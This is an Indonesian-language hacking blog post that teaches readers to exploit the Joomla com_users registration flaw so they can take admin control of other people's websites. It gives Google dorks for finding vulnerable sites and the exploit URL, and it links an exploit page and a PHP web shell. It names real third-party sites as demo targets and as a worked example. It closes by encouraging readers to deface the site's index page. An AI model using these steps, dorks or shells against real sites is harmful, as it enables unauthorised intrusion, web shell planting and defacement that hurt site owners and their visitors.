ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren??
Jiahaha :v Sabar dikit donkkk :D
oke langsung saja . cekidotttt :)
Note : jangan lupa berdo'a dulu :)
-----------------------------------------------------------------------------------------------
"Talk Less Do More!" :p
oke dah simak nih! sebelumnya download dulu bahan2nya :p
1. Download : Exploit Joomla.html Password: Lihat
2. Titip Nama : Indonesian Cyber Army
3. Shell Download : Injection.php
UPDATE:
Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...
Contoh :
http://troytradingint.com.pe/administrator/
bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User
Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Langkah Langkah::
1. Cari web target di Google.com dengan memasukkan Dork berikut:
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Lain:
inurl:index.php/using-joomla/extensions/plugins
inurl:index.php/using/joomla
inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery
inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-
Inurl:index.php/plugins
Inurl:index.php/rss=feed
inurl:index.php/joomla/content/category-blog/24-joomla
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2
inurl:index.php/19-sample-data-articles/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form
Note: Jika ingin lebih banyak lagi ,. [ KEMBANGKAN SENDIRI ] -_-
2. Pilih target sobat, lalu masukin exploit berikut:
index.php?option=com_users&view=registration
3. Ane disini mengambil contoh:
http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss
4. kemudian ane ganti menjadi:
http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration
kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:
Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!
8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!
9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!
10. Lalu masuk kehalaman admin login nya!
http://mobile.resto-lincontournable.com/administrator
Username: Riki
Password: Vendeta
Duaaarrrrhhhhh :v !! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index
KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!! (Bruakowoakowkoka :v )
__________________________________________________________
Goodluck!!! :p
udah gitu aja! Salam........ :p
_____________________________
| Content Created By Boss Riki :v << |
| Thanks to : Indonesian Cyber Army
==========================
0 komentar:
Posting Komentar